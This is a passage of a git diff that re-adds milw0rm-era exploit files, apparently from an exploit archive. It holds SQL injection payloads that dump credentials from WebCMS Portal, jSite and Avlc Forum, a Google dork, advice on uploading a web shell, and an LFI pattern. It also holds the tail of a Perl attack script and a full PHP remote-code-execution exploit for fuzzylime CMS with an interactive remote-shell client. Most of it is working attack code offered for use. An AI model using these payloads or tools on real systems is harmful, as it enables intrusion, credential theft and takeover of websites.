+	        $string = $ff.$replace_by1.$ee;
+
+		    return $string;
+		}
+	}
+	sub get_d_p_s
+	{
+		$k = 0;
+		$v = 0;
+		$g_d_p_s = shift;
+
+		@post = ();
+		@get = ();
+		
+		$post_data = "";
+		$get_data = "";
+		$header_data = "";
+		%header_dA = ();
+		$p = "";
+		$g = "";
+		while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
+			{
+			if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)
+				{
+				$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
+				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {
+					$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";
+				} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
+				{
+				        $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
+				}
+			}
+		if ($g_d_p_s eq "get")
+			{
+			return $g;
+			}
+			elsif ($g_d_p_s eq "post")
+		{
+			return $p;
+		} elsif ($g_d_p_s eq "header")
+		{
+			return %header_dA;
+		}
+
+			@a_ = ();
+	}
+	sub get_data
+	{
+		$h_host_h_xdsjaop = shift;
+		$h_path_h_xdsjaop = shift;
+		%hash = get_d_p_s("header");
+	    while (($u,$c) = each(%hash))
+			{
+			$ua->default_headers->push_header($u => $c);
+			}
+		$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
+		return $req->content;
+	}
+	sub post_data
+	{
+		$h_host_h_xdsjaop = shift;
+		$h_path_h_xdsjaop = shift;
+		$content_type = shift;
+		$send = shift;
+		%hash = get_d_p_s("header");
+	    while (($u,$c) = each(%hash))
+			{
+		    $ua->default_headers->push_header($u => $c);
+			}
+		$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);
+		$req->content_type($content_type);
+		$req->content($send);
+		$res = $ua->request($req);
+		return $res->content;
+	}
+
+}
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6056.txt b/platforms/php/webapps/6056.txt
index 44a14fcee..13285f45c 100755
--- a/platforms/php/webapps/6056.txt
+++ b/platforms/php/webapps/6056.txt
@@ -1,43 +1,43 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL InjEcti0n Vulnerability
-##
-## WebCMS Portal ( index.php menu )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-##  Name : WebCMS Portal
-##
-##  Site : www.webcms.es
-##
-########################
-########################
-##
-## -((:: L!VE DEMO ::))-
-##
-## http://www.webcms.es/demos/portal/index.php?menu=tablon&apartado=ver_anuncio&id=-43+union+select+0,0,0,concat_ws(0x3a,login,password,email),0,0,0,0,0,0,0,0+from+usuarios/*
-##
-########################
-########################
- 
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-07-12]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL InjEcti0n Vulnerability
+##
+## WebCMS Portal ( index.php menu )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+##  Name : WebCMS Portal
+##
+##  Site : www.webcms.es
+##
+########################
+########################
+##
+## -((:: L!VE DEMO ::))-
+##
+## http://www.webcms.es/demos/portal/index.php?menu=tablon&apartado=ver_anuncio&id=-43+union+select+0,0,0,concat_ws(0x3a,login,password,email),0,0,0,0,0,0,0,0+from+usuarios/*
+##
+########################
+########################
+ 
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6057.txt b/platforms/php/webapps/6057.txt
index cec134aae..6222b970e 100755
--- a/platforms/php/webapps/6057.txt
+++ b/platforms/php/webapps/6057.txt
@@ -1,52 +1,52 @@
---==+================================================================================+==--
---==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility                 +==--
---==+================================================================================+==--
-
--=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-
-
-AUTHOR: S.W.A.T.
-
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-Download: http://www.sclek.com/jsite.zip
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-DORK (google): "Powered by jSite 1.0 OE"
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-DESCRIPTION:
-You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-EXPLOITS:
-www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws
-
-(0x3a,user,pass),admin/**/from/**/jsite_users/*
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-NOTE/TIP:
-
-1 Week Off & I Be Back :D ;)
-
-Admin Login Is At /admin/
-
-U Can Upload Your Shell When U Login Successfully
-From This Link: www.site.com/admin/index.php?menu=uploads
-& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php
-
--=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-Exploit:
-
- www.[target].com/Script/index.php?module=[LFI]
-
-
---==+================================================================================+==--
---==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility                 +==--
---==+================================================================================+==--
-
-# milw0rm.com [2008-07-12]
+--==+================================================================================+==--
+--==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility                 +==--
+--==+================================================================================+==--
+
+-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-
+
+AUTHOR: S.W.A.T.
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Download: http://www.sclek.com/jsite.zip
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+DORK (google): "Powered by jSite 1.0 OE"
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+DESCRIPTION:
+You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+EXPLOITS:
+www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws
+
+(0x3a,user,pass),admin/**/from/**/jsite_users/*
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+NOTE/TIP:
+
+1 Week Off & I Be Back :D ;)
+
+Admin Login Is At /admin/
+
+U Can Upload Your Shell When U Login Successfully
+From This Link: www.site.com/admin/index.php?menu=uploads
+& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php
+
+-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Exploit:
+
+ www.[target].com/Script/index.php?module=[LFI]
+
+
+--==+================================================================================+==--
+--==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility                 +==--
+--==+================================================================================+==--
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6058.txt b/platforms/php/webapps/6058.txt
index aa5f25cf4..b1c419c1a 100755
--- a/platforms/php/webapps/6058.txt
+++ b/platforms/php/webapps/6058.txt
@@ -1,54 +1,54 @@
-====================================================================
-  Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
-====================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 12 July 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : Avlc Forum
- VERSION     : N/A
- VENDOR	     : N/A
- DOWNLOAD    : http://www.easy-script.com/compt.php?id=2147
-#####################################################
-
--- Remote SQL Injection ---
-
----------------------------------
- Vulnerable File [vlc_forum.php]
----------------------------------
-
-@Line
-
-   141:  $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
-   142:  $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'
    ' . mysql_error());
-
-
--------------
- POC Exploit
--------------
-
-[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--
-
-
-#####################################################################
- Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
- Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-07-12]
+====================================================================
+  Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
+====================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 12 July 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : Avlc Forum
+ VERSION     : N/A
+ VENDOR	     : N/A
+ DOWNLOAD    : http://www.easy-script.com/compt.php?id=2147
+#####################################################
+
+-- Remote SQL Injection ---
+
+---------------------------------
+ Vulnerable File [vlc_forum.php]
+---------------------------------
+
+@Line
+
+   141:  $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";
+   142:  $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'
    ' . mysql_error());
+
+
+-------------
+ POC Exploit
+-------------
+
+[+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--
+
+
+#####################################################################
+ Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos   
+ Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-07-12]
diff --git a/platforms/php/webapps/6060.php b/platforms/php/webapps/6060.php
index 54d0b88aa..c3b1ff413 100755
--- a/platforms/php/webapps/6060.php
+++ b/platforms/php/webapps/6060.php
@@ -1,444 +1,444 @@
-
-##
-## Conditions: None
-##
-## Greetz:     Inphex, hEEGy and austeN
-##
-## Explanations
-## ************
-##
-## Ok, so today we will go for a walk in the fuzzylime cms maze ...
-## Finding vulns was easy, but finding a no condition vuln was quite
-## harder ...
-##
-## First, we look to the code/content.php file:
-##
-##---[code/content.php]------------------------------------------
-## 02| require_once("code/functions.php");
-## --| [...]
-## 09| $countfile = "code/counter/${s}_$p.inc.php";
-## 10| if(file_exists($countfile)) {
-## 11|     $curcount = loadfile($countfile);
-## 12| }
-## 13| $curcount++;
-## 14| if($handle = @fopen($countfile, 'w')) { // Open the file for saving
-## 15|     fputs($handle, $curcount);
-## 16|     fclose($handle);
-## 17| }
-##----------------------------------------------------------------
-##
-## $s, $p, $curcount vars are not initialized, so we can set it if
-## register_globals=On.
-##
-## POC: http://[url]/code/content.php?s=owned&p=owned&curcount=[PHP_SCRIPT]
-##
-## Note: [C:\]# php -r "$var='abc'; $var++; print $var;"
-##       abd
-## So the ++ just increment the last string letter position in the alphabet
-## a->b, b->c, etc.
-##
-## Ok, we got remote code exec ... but wait a minute ... no ! require_once()
-## requires a file in the code folder, but we are already in this folder ...
-## PHP will die (Fatal Error) and our evil code won't be executed.
-## And we wanted a no condition exploit, but this vuln needs register_globals
-## to be On ...
-##
-## hum... let's look at other pages: we can find that extract() function is
-## pretty often used, and it can simulate register_globals ...
-## Now we are looking for a file which uses extract() and which can include
-## code/content.php file, and which is in the root path.
-##
-## And we finally found commsrss.php, which contains:
-##
-##---[commsrss.php]-----------------------------------------------
-## 17| extract($HTTP_POST_VARS); 
-## 18| extract($_POST);
-## 19| extract($HTTP_GET_VARS); 
-## 20| extract($_GET);
-## 21| extract($HTTP_COOKIE_VARS); 
-## 22| extract($_COOKIE);
-## --| [...]
-## 64| $dir = "blogs/comments/";
-## 65| if($dlist = opendir($dir)) {
-## 66|     while (($file = readdir($dlist)) !== false) {
-## 67|         if(strstr($file, $p)) {
-## 68|             $files[] = $file;
-## 69|         }
-## 70|     }
-## 71|     closedir($dlist);
-## 72| }
-## 73| for($i = 0; $i < count($files); $i++) {
-## 74|     include "blogs/comments/$files[$i]";
-## --| [...]
-## 89| }
-##----------------------------------------------------------------
-##
-## w00t ! $files array is not initialized ... we can include every
-## file we want.
-##
-## Using chr() we can bypass magic_quotes_gpc=Off [ see chrit() ]
-##
-## Our problems are solved, we have a Remote Code Execution without
-## conditions.
-##
-## Proof of Concept
-## ****************
-##
-## [C:\]# php exploit.php http://www.target.com/
-## [target][cmd]# ls
-## blogs_.inc.php
-## content_index.inc.php
-## content_index.php.inc.php
-## content_test.inc.php
-## front_index.inc.php
-## front_test.inc.php
-## index.htm
-## index.php_index.inc.php
-##
-## [target][cmd]# exit
-##
-## [C:\]# 
-
-$url = $argv[1];
-
-
-$php_code = '';
-
-$php_code--; // 13| $curcount++;
-
-$c0de  = $url . 'commsrss.php?s=blogs&m=&usecache=0&files[0]=../../code/content.php'
-              . '&curcount=' . urlencode($php_code);
-
-$shell = $url . 'code/counter/blogs_.inc.php';
-
-
-# Be careful: we can create a valid shell only ONCE.
-# So check if it does not already exist before doing
-# anything else.
-if(status_404($shell)==true)
-	get($c0de);
-
-$phpR = new phpreter($shell, '-:-:-(.*)-:-:-', 'cmd', array(), false);
-
-function chrit($str)
-{
-	$r = '';
-	
-	for($i=0;$i
- * VERSION:        1.0
- * LICENSE:        GNU General Public License
- *
- * This is a really simple class with permits to exec SQL, PHP or CMD
- * on a remote host using the HTTP "Shell" header.
- *
- *
- * Sample code:
- * [host][sql]# mode=cmd
- * [host][cmd]# id
- * uid=2176(u47170584) gid=600(ftpusers)
- * 
- * [host][cmd]# mode=php
- * [host][php]# echo phpversion();
- * 4.4.8
- * [host][php]# mode=sql
- * [host][sql]# SELECT version(), user()
- * --------------------------------------------------
- *  version()           | 5.0.51a-log
- *  user()              | dbo225004932@74.208.16.148
- * --------------------------------------------------
- * 
- * [host][sql]#
- *
- */
-
-class phpreter
-{
-	var $url;
-	var $host;
-	var $port;
-	var $page;
-	
-	var $mode;
-	
-	var $ssql;
-	
-	var $prompt;
-	var $phost;
-	
-	var $regex;
-	var $data;
-	
-	/**
-	 * __construct()
-	 *
-	 * @param url      The url of the remote shell.
-	 * @param regexp   The regex to catch cmd result.
-	 * @param mode     Mode: php, sql or cmd.
-	 * @param sql      An array with the file to include,
-	 *                 and sql vars
-	 * @param clear    Determines if clear() is called
-	 *                 on startup
-	 */
-	function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
-	{
-		$this->url = $url;
-		
-		$this->regex = '#'.$regexp.'#is';
-		
-		#
-		# Set data
-		#
-		
-		$infos         =	parse_url($this->url);
-		$this->host    =	$infos['host'];
-		$this->port    =	isset($infos['port']) ? $infos['port'] : 80;
-		$this->page    =	$infos['path'];
-		unset($infos);
-		
-		# www.(site).com
-		$host_tmp      =	explode('.',$this->host);
-		$this->phost   =	$host_tmp[ count($host_tmp)-2 ];
-		unset($host_tmp);
-		
-		#
-		# Set up MySQL connection string
-		#
-		if(!sizeof($sql))
-			$this->ssql = '';
-		elseif(sizeof($sql)==5)
-		{
-			$this->ssql = "include('$sql[0]');"
-			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
-				    . "mysql_select_db($sql[4]);";
-		}
-		else
-		{
-			$this->ssql = ""
-			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
-				    . "mysql_select_db('$sql[3]');";
-		}
-		
-		$this->setmode($mode);
-		
-		#
-		# Main Loop
-		#
-
-		if($clear) $this->clear();
-		print $this->prompt;
-
-		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
-		{
-			# change mode
-			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))
-				$this->setmode($array[3]);
-			
-			# clear data
-			elseif(preg_match('#^clear$#i',$cmd))
-				$this->clear();
-			
-			# else
-			else print $this->exec($cmd);
-			
-			print $this->prompt;
-		}
-	}
-	
-	/**
-	 * clear()
-	 * Just clears ouput, printing '\n'x50
-	 */
-	function clear()
-	{
-		print str_repeat("\n", 50);
-		return 0;
-	}
-	
-	/**
-	 * setmode()
-	 * Set mode (PHP, CMD, SQL)
-	 * You don't have to call it.
-	 * use mode=[php|cmd|sql] instead,
-	 * in the prompt.
-	 */
-	function setmode($newmode)
-	{
-		$this->mode = strtolower($newmode);
-		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
-		
-		switch($this->mode)
-		{
-			case 'cmd':
-				$this->data = 'system(\'\');';
-				break;
-			case 'php':
-				$this->data = '';
-				break;
-			case 'sql':
-				$this->data = $this->ssql
-				            . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");'
-					    . 'print str_repeat("-",50)."\n";'
-					    . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
-					    . '{'
-					    . 	'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
-					    . 	'print str_repeat("-",50)."\n";'
-					    . '}';
-				break;
-		}
-		return $this->mode;
-	}
-
-	/**
-	 * exec()
-	 * Execute any query and catch the result.
-	 * You don't have to call it.
-	 */
-	function exec($cmd)
-	{
-		if(!strlen($this->data))	$shell = $cmd;
-		else                    	$shell = str_replace('', addslashes($cmd), $this->data);
-		
-		$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
-		
-		$req  = "GET " . $this->page . " HTTP/1.1\r\n";
-		$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\r\n";
-		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
-		$req .= "Shell: $shell\r\n";
-		$req .= "Connection: close\r\n\r\n";
-		
-		unset($shell);
-
-		fputs($fp, $req);
-		
-		$content = '';
-		while(!feof($fp)) $content .= fgets($fp, 128);
-		
-		fclose($fp);
-		
-		# Remove headers
-		$data    = explode("\r\n\r\n", $content);
-		$headers = array_shift($data);
-		$content = implode("\r\n\r\n", $data);
-		
-		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
-			$content = $this->unchunk($content);
-	
-		preg_match($this->regex, $content, $data);
-		
-		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
-		
-		return $data[1];
-	}
-	
-	/**
-	 * unchunk()
-	 * This function aims to remove chunked content sizes which
-	 * are putted by apache server when it uses chunked
-	 * transfert-encoding.
-	 */
-	function unchunk($data)
-	{
-		$dsize  = 1;
-		$offset = 0;
-		
-		while($dsize>0)
-		{
-			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
-			
-			$dsize = hexdec(substr($data, $offset, $hsize_size));
-			
-			# Remove $hsize\r\n from $data
-			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
-			
-			$offset += $dsize;
-			
-			# Remove the \r\n before the next $hsize
-			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
-		}
-		
-		return $data;
-	}
-}
-
-?>
-
-# milw0rm.com [2008-07-13]
+
+##
+## Conditions: None
+##
+## Greetz:     Inphex, hEEGy and austeN
+##
+## Explanations
+## ************
+##
+## Ok, so today we will go for a walk in the fuzzylime cms maze ...
+## Finding vulns was easy, but finding a no condition vuln was quite
+## harder ...
+##
+## First, we look to the code/content.php file:
+##
+##---[code/content.php]------------------------------------------
+## 02| require_once("code/functions.php");
+## --| [...]
+## 09| $countfile = "code/counter/${s}_$p.inc.php";
+## 10| if(file_exists($countfile)) {
+## 11|     $curcount = loadfile($countfile);
+## 12| }
+## 13| $curcount++;
+## 14| if($handle = @fopen($countfile, 'w')) { // Open the file for saving
+## 15|     fputs($handle, $curcount);
+## 16|     fclose($handle);
+## 17| }
+##----------------------------------------------------------------
+##
+## $s, $p, $curcount vars are not initialized, so we can set it if
+## register_globals=On.
+##
+## POC: http://[url]/code/content.php?s=owned&p=owned&curcount=[PHP_SCRIPT]
+##
+## Note: [C:\]# php -r "$var='abc'; $var++; print $var;"
+##       abd
+## So the ++ just increment the last string letter position in the alphabet
+## a->b, b->c, etc.
+##
+## Ok, we got remote code exec ... but wait a minute ... no ! require_once()
+## requires a file in the code folder, but we are already in this folder ...
+## PHP will die (Fatal Error) and our evil code won't be executed.
+## And we wanted a no condition exploit, but this vuln needs register_globals
+## to be On ...
+##
+## hum... let's look at other pages: we can find that extract() function is
+## pretty often used, and it can simulate register_globals ...
+## Now we are looking for a file which uses extract() and which can include
+## code/content.php file, and which is in the root path.
+##
+## And we finally found commsrss.php, which contains:
+##
+##---[commsrss.php]-----------------------------------------------
+## 17| extract($HTTP_POST_VARS); 
+## 18| extract($_POST);
+## 19| extract($HTTP_GET_VARS); 
+## 20| extract($_GET);
+## 21| extract($HTTP_COOKIE_VARS); 
+## 22| extract($_COOKIE);
+## --| [...]
+## 64| $dir = "blogs/comments/";
+## 65| if($dlist = opendir($dir)) {
+## 66|     while (($file = readdir($dlist)) !== false) {
+## 67|         if(strstr($file, $p)) {
+## 68|             $files[] = $file;
+## 69|         }
+## 70|     }
+## 71|     closedir($dlist);
+## 72| }
+## 73| for($i = 0; $i < count($files); $i++) {
+## 74|     include "blogs/comments/$files[$i]";
+## --| [...]
+## 89| }
+##----------------------------------------------------------------
+##
+## w00t ! $files array is not initialized ... we can include every
+## file we want.
+##
+## Using chr() we can bypass magic_quotes_gpc=Off [ see chrit() ]
+##
+## Our problems are solved, we have a Remote Code Execution without
+## conditions.
+##
+## Proof of Concept
+## ****************
+##
+## [C:\]# php exploit.php http://www.target.com/
+## [target][cmd]# ls
+## blogs_.inc.php
+## content_index.inc.php
+## content_index.php.inc.php
+## content_test.inc.php
+## front_index.inc.php
+## front_test.inc.php
+## index.htm
+## index.php_index.inc.php
+##
+## [target][cmd]# exit
+##
+## [C:\]# 
+
+$url = $argv[1];
+
+
+$php_code = '';
+
+$php_code--; // 13| $curcount++;
+
+$c0de  = $url . 'commsrss.php?s=blogs&m=&usecache=0&files[0]=../../code/content.php'
+              . '&curcount=' . urlencode($php_code);
+
+$shell = $url . 'code/counter/blogs_.inc.php';
+
+
+# Be careful: we can create a valid shell only ONCE.
+# So check if it does not already exist before doing
+# anything else.
+if(status_404($shell)==true)
+	get($c0de);
+
+$phpR = new phpreter($shell, '-:-:-(.*)-:-:-', 'cmd', array(), false);
+
+function chrit($str)
+{
+	$r = '';
+	
+	for($i=0;$i
+ * VERSION:        1.0
+ * LICENSE:        GNU General Public License
+ *
+ * This is a really simple class with permits to exec SQL, PHP or CMD
+ * on a remote host using the HTTP "Shell" header.
+ *
+ *
+ * Sample code:
+ * [host][sql]# mode=cmd
+ * [host][cmd]# id
+ * uid=2176(u47170584) gid=600(ftpusers)
+ * 
+ * [host][cmd]# mode=php
+ * [host][php]# echo phpversion();
+ * 4.4.8
+ * [host][php]# mode=sql
+ * [host][sql]# SELECT version(), user()
+ * --------------------------------------------------
+ *  version()           | 5.0.51a-log
+ *  user()              | dbo225004932@74.208.16.148
+ * --------------------------------------------------
+ * 
+ * [host][sql]#
+ *
+ */
+
+class phpreter
+{
+	var $url;
+	var $host;
+	var $port;
+	var $page;
+	
+	var $mode;
+	
+	var $ssql;
+	
+	var $prompt;
+	var $phost;
+	
+	var $regex;
+	var $data;
+	
+	/**
+	 * __construct()
+	 *
+	 * @param url      The url of the remote shell.
+	 * @param regexp   The regex to catch cmd result.
+	 * @param mode     Mode: php, sql or cmd.
+	 * @param sql      An array with the file to include,
+	 *                 and sql vars
+	 * @param clear    Determines if clear() is called
+	 *                 on startup
+	 */
+	function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
+	{
+		$this->url = $url;
+		
+		$this->regex = '#'.$regexp.'#is';
+		
+		#
+		# Set data
+		#
+		
+		$infos         =	parse_url($this->url);
+		$this->host    =	$infos['host'];
+		$this->port    =	isset($infos['port']) ? $infos['port'] : 80;
+		$this->page    =	$infos['path'];
+		unset($infos);
+		
+		# www.(site).com
+		$host_tmp      =	explode('.',$this->host);
+		$this->phost   =	$host_tmp[ count($host_tmp)-2 ];
+		unset($host_tmp);
+		
+		#
+		# Set up MySQL connection string
+		#
+		if(!sizeof($sql))
+			$this->ssql = '';
+		elseif(sizeof($sql)==5)
+		{
+			$this->ssql = "include('$sql[0]');"
+			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
+				    . "mysql_select_db($sql[4]);";
+		}
+		else
+		{
+			$this->ssql = ""
+			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
+				    . "mysql_select_db('$sql[3]');";
+		}
+		
+		$this->setmode($mode);
+		
+		#
+		# Main Loop
+		#
+
+		if($clear) $this->clear();
+		print $this->prompt;
+
+		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
+		{
+			# change mode
+			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array))
+				$this->setmode($array[3]);
+			
+			# clear data
+			elseif(preg_match('#^clear$#i',$cmd))
+				$this->clear();
+			
+			# else
+			else print $this->exec($cmd);
+			
+			print $this->prompt;
+		}
+	}
+	
+	/**
+	 * clear()
+	 * Just clears ouput, printing '\n'x50
+	 */
+	function clear()
+	{
+		print str_repeat("\n", 50);
+		return 0;
+	}
+	
+	/**
+	 * setmode()
+	 * Set mode (PHP, CMD, SQL)
+	 * You don't have to call it.
+	 * use mode=[php|cmd|sql] instead,
+	 * in the prompt.
+	 */
+	function setmode($newmode)
+	{
+		$this->mode = strtolower($newmode);
+		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
+		
+		switch($this->mode)
+		{
+			case 'cmd':
+				$this->data = 'system(\'\');';
+				break;
+			case 'php':
+				$this->data = '';
+				break;
+			case 'sql':
+				$this->data = $this->ssql
+				            . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");'
+					    . 'print str_repeat("-",50)."\n";'
+					    . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
+					    . '{'
+					    . 	'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
+					    . 	'print str_repeat("-",50)."\n";'
+					    . '}';
+				break;
+		}
+		return $this->mode;
+	}
+
+	/**
+	 * exec()
+	 * Execute any query and catch the result.
+	 * You don't have to call it.
+	 */
+	function exec($cmd)
+	{
+		if(!strlen($this->data))	$shell = $cmd;
+		else                    	$shell = str_replace('', addslashes($cmd), $this->data);
+		
+		$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
+		
+		$req  = "GET " . $this->page . " HTTP/1.1\r\n";
+		$req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . "\r\n";
+		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
+		$req .= "Shell: $shell\r\n";
+		$req .= "Connection: close\r\n\r\n";
+		
+		unset($shell);
+
+		fputs($fp, $req);
+		
+		$content = '';
+		while(!feof($fp)) $content .= fgets($fp, 128);
+		
+		fclose($fp);
+		
+		# Remove headers
